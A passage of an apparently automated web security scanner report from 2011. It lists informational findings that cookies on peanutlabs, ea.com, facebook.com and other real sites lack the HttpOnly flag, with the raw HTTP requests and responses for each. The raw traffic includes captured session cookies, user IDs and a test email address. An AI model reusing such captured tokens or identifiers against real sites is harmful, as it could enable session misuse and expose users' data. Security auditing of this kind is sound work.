Referer: http://www.e00.peanutlabs.com/js/iFrame/index.php?userId=998826224-3432-8939b981e2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; __utmc=160559081; __utmb=160559081.1.10.1294536631

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800, public
Cache-control: no-cache="set-cookie"
Content-Type: image/jpeg
Date: Sun, 09 Jan 2011 01:30:24 GMT
ETag: "7e878-3a36-4749170d611c0"
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Last-Modified: Sun, 27 Sep 2009 16:11:59 GMT
Server: Apache
Set-Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D6917E97B67B5A5E4D3EB1494CA107BC4756C9D1E7917A75869111F0EAA4A056867F2254F716FAB6B9BD336486E7AB4FDD4D1;MAX-AGE=600
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 14902

......JFIF.............<CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 100
...C....................................................................C.............................................
...[SNIP]...

10.56. http://www.e00.peanutlabs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F;MAX-AGE=600

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800, public
Cache-control: no-cache="set-cookie"
Content-Type: image/x-icon
Date: Sun, 09 Jan 2011 02:50:08 GMT
ETag: "b404ae-13e-495d459dde063"
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Last-Modified: Wed, 24 Nov 2010 22:53:00 GMT
Server: Apache
Set-Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F;MAX-AGE=600
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 318

..............(.......(....... ...................................&...J^q.7BM.. &....................................................................................................@..................
...[SNIP]...

10.57. http://www.e00.peanutlabs.com/js/iFrame/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/iFrame/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com
AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F;MAX-AGE=600

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-control: no-cache="set-cookie"
Content-Type: text/html
Date: Sun, 09 Jan 2011 01:30:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com
Set-Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F;MAX-AGE=600
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 112603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

       <!-- If
...[SNIP]...

10.58. http://www.e00.peanutlabs.com/js/images/languages/icon_world.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/js/images/languages/icon_world.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AWSELB=052955471CE77557C5059B093FDB80564CA14D6917E97B67B5A5E4D3EB1494CA107BC4756C9D1E7917A75869111F0EAA4A056867F2254F716FAB6B9BD336486E7AB4FDD4D1;MAX-AGE=600

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/images/languages/icon_world.png HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.e00.peanutlabs.com/js/iFrame/index.php?userId=998826224-3432-8939b981e2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; __utmc=160559081; __utmb=160559081.1.10.1294536631

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800, public
Cache-control: no-cache="set-cookie"
Content-Type: image/png
Date: Sun, 09 Jan 2011 01:30:24 GMT
ETag: "b603dc-332-495d459e78abb"
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Last-Modified: Wed, 24 Nov 2010 22:53:00 GMT
Server: Apache
Set-Cookie: AWSELB=052955471CE77557C5059B093FDB80564CA14D6917E97B67B5A5E4D3EB1494CA107BC4756C9D1E7917A75869111F0EAA4A056867F2254F716FAB6B9BD336486E7AB4FDD4D1;MAX-AGE=600
Vary: Accept-Encoding,User-Agent
Connection: keep-alive
Content-Length: 818

.PNG
.
...IHDR..............H-.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.,.]H.a......nns.[[..67..g.....d..$.n..!..,P,!.........
...,%A,T..5.....6..n......yn........TT. b. D.L-I....jp..[.I.i.
...[SNIP]...

10.59. http://www.e00.peanutlabs.com/recvMid.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.e00.peanutlabs.com
Path:	/recvMid.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

AWSELB=052955471CE77557C5059B093FDB80564CA14D691772F16F2083BC8247835042071AB0E5EE05720064753CC7EA313DAFB2493BDCE9D100F7791BFE5D631D63157368D3863F;MAX-AGE=600

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /recvMid.php?mid=undefined&userId=998826224%2D3432%2D8939b981e2 HTTP/1.1
Host: www.e00.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.e00.peanutlabs.com/js/iFrame/mloader.swf?userId=998826224-3432-8939b981e2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; __utmc=160559081; __utmb=160559081.1.10.1294536631

Response

10.60. http://www.ea.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=roj6d8htea48u7e576mme7s3h2; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:29 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=roj6d8htea48u7e576mme7s3h2; path=/
Set-Cookie: displayCountrySelector=true; expires=Wed, 09-Feb-2011 03:07:29 GMT; domain=ea.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.61. http://www.ea.com/hasbro previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/hasbro

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=t8hoe1ig0k16bn396grb2ghf02; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hasbro HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:29 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=t8hoe1ig0k16bn396grb2ghf02; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.62. http://www.ea.com/ipad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/ipad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=27lnus2ntqriv5k00j2k40ng93; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipad HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:44 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=27lnus2ntqriv5k00j2k40ng93; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 61969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.63. http://www.ea.com/iphone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/iphone

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=18e0qmhkmneofnmkng5qlhs1k4; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iphone HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.64. http://www.ea.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=3f7u6pkb5ng23ddteumgngbv25; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.65. http://www.ea.com/platform/online-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/online-games

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=jbq0ai9k9l5t598m4of0l22c32; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /platform/online-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:33 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=jbq0ai9k9l5t598m4of0l22c32; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 68051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.66. http://www.ea.com/platform/pc-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/pc-games

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=402g5cpkl5kqg8i27g71bepsl4; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /platform/pc-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:31 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=402g5cpkl5kqg8i27g71bepsl4; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 84317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.67. http://www.ea.com/platform/ps3-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/ps3-games

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=4l4p40mas0vbdpd6hs2fi6r4h4; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /platform/ps3-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:40 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=4l4p40mas0vbdpd6hs2fi6r4h4; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 84808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.68. http://www.ea.com/platform/xbox-360-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/xbox-360-games

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=50refd00geb05if67umc20au74; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /platform/xbox-360-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:34 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=50refd00geb05if67umc20au74; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 84273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.69. http://www.ea.com/wii previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/wii

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

symfony=4vsvrj360p5moup45jahp1d1l2; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wii HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:41 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=4vsvrj360p5moup45jahp1d1l2; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

10.70. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=BqNeE; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.71. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=zoSHS; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.72. http://www.facebook.com/Pogo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Pogo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=DGAoC; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.73. http://www.facebook.com/event.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/event.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=8aDVi; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/?sk=events
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=8aDVi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:19:48 GMT
Content-Length: 0

10.74. http://www.facebook.com/logout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/logout.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=77KNI; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.75. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Packet-Storm-Security/116613458352817

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=VcqBg; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;

Response

10.76. http://www.facebook.com/peanutlabs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peanutlabs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=WrbZx; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.77. http://www.facebook.com/sitetour/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sitetour/connect.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=4KsQr; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.78. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lsd=tJ98F; path=/; domain=.facebook.com
reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:27:42 GMT
Content-Length: 16799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.79. http://www.gamespot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

geolocn=MTczLjE5My4yMTQuMjQzOjg0MDo2MjM%3D; expires=Tue, 08-Feb-2011 01:43:55 GMT; path=/; domain=.gamespot.com
ctk=NGQyOTEyZGJhZGMxZDZmMzEyMjkyNmUwMDViNQ%3D%3D; expires=Fri, 08-Jul-2011 01:43:55 GMT; path=/; domain=.gamespot.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.gamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.80. http://www.intellicast.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

